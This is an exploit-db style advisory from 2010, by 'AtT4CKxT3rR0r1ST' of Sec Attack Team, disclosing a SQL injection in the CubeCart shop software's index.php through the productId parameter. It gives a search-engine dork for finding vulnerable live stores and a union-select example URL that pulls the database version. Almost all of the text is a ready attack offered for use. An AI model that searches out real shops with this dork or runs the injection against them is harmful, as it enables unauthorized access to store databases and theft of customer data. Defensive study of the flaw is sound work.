CubeCart – ‘index.php’ SQL Injection

  • 作者: AtT4CKxT3rR0r1ST
    日期: 2010-02-18
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11495/
  • CubeCart (index.php) Sql Injection Vulnerability
    ==============================================================
    
    ####################################################################
    .:. Author : AtT4CKxT3rR0r1ST[F.Hack@w.cn]
    .:. Team : Sec Attack Team
    .:. Home : www.sec-attack.com/vb
    .:. Script : http://www.cubecart.com/downloads/
    .:. Dork : "powered by CubeCart" inurl:"index.php?_a="
    
    ####################################################################
    
    ===[ Exploit ]===
    
    www.site.com/index.php?_a=viewProd&productId=22[SqlSql Injection]
    
    ===[ Example ]===
    
    http://server/store/index.php?_a=viewProd&productId=22+and+1=2+union+select+version()
    
    ####################################################################